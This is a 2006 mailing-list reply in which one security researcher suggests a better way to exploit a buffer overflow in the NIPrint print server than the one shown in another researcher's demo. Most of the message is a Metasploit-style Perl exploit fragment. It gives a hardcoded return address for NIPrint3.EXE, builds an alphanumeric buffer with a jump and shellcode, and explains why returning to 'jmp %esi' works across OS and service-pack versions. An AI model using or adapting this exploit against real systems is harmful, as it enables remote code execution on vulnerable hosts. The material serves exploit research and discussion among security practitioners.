Re: VisualSploit redux

[H D Moore <hdm-daily-dave () digitaloffense net>]

On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> Anyways, there's a movie here:
> http://www.immunitysec.com/documentation/vs_niprint.html

Not to nitpick, but there is a better way to exploit this bug:

'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],

my $req = Pex::Text::AlphaNumText(8192);
substr($req, 0, 2, "\xeb\x33");
substr($req, 49, 4, pack('V', $target->[1]));
substr($req, 53, length($shellcode), $shellcode);
$s->Send($req);

This will return to a "jmp %esi", where %esi points to the source string 
before the memory overwrite. The benefits of this vs the "jmp %esp":
* Our code isn't running so close to ESP (easy to fix w/prepend)
* More room for the actual payload (could even embed the ret)
* The return address will work regardless of OS/SP combo

Fun stuff, keep up the demos :-)

-HD